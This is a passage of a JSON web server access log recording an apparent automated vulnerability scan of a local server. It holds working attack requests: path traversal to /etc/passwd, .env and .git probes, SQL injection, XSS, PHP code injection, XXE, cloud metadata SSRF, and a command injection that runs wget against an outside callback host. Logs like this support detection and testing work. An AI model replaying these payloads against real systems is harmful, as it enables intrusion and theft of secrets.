"request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"page=index');${system('echo lotuscms_rce | md5sum')};#\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetSrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"page=index');${system('echo lotuscms_rce | md5sum')};#\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lcms/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/getagent.cgi?type=s&xxxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetDevice HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /img../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.example HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /css../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/scripts/ajax/package/cfajax.js HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/api.php?mobile/webNasIPS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"TNAS", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /versa/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.207","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sample.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /users/user-dark-features HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.004","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proxy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /events../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /a.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27` HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /media../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htaccess_for_page_not_found_redirects.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.do?file=../../../../config.text HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /themes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /downloadfile.php?file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenario/admin/welcome.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"\x0D\x0A]>\x0D\x0A\x0D\x0A\x0D\x0Aaaaaa\x0D\x0A&xxe;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Autodiscover/Autodiscover.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"----------------------------835846770881083140190633\x0D\x0AContent-Disposition: form-data; name=\x22editormd-image-file\x22; filename=\x22test.<>php\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0A\x0D\x0A----------------------------835846770881083140190633--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?s=/home/page/uploadImg HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer/send_email?to=Kdmc@AJpI&url=http://c9v8hs0smpv8c6ag07h0nfs4fsk5zph7d.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\x0D\x0AdataBlockSize=64\x0D\x0Atimeout=1\x0D\x0AnumberOfRepetitions=4\x0D\x0Ahost=$(echo 127.0.0.1; wget http://c9v8hn0smpv8c57g0t00fhrdk68uomfzd.oast.live)\x0D\x0AX_TP_ConnName=ewan_ipoe_d\x0D\x0AdiagnosticsState=Requested","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi?2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/mainFrame.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upload.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"100.100.100.200","request":"GET http://100.100.100.200/dynamic/instance-identity/document HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.201","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 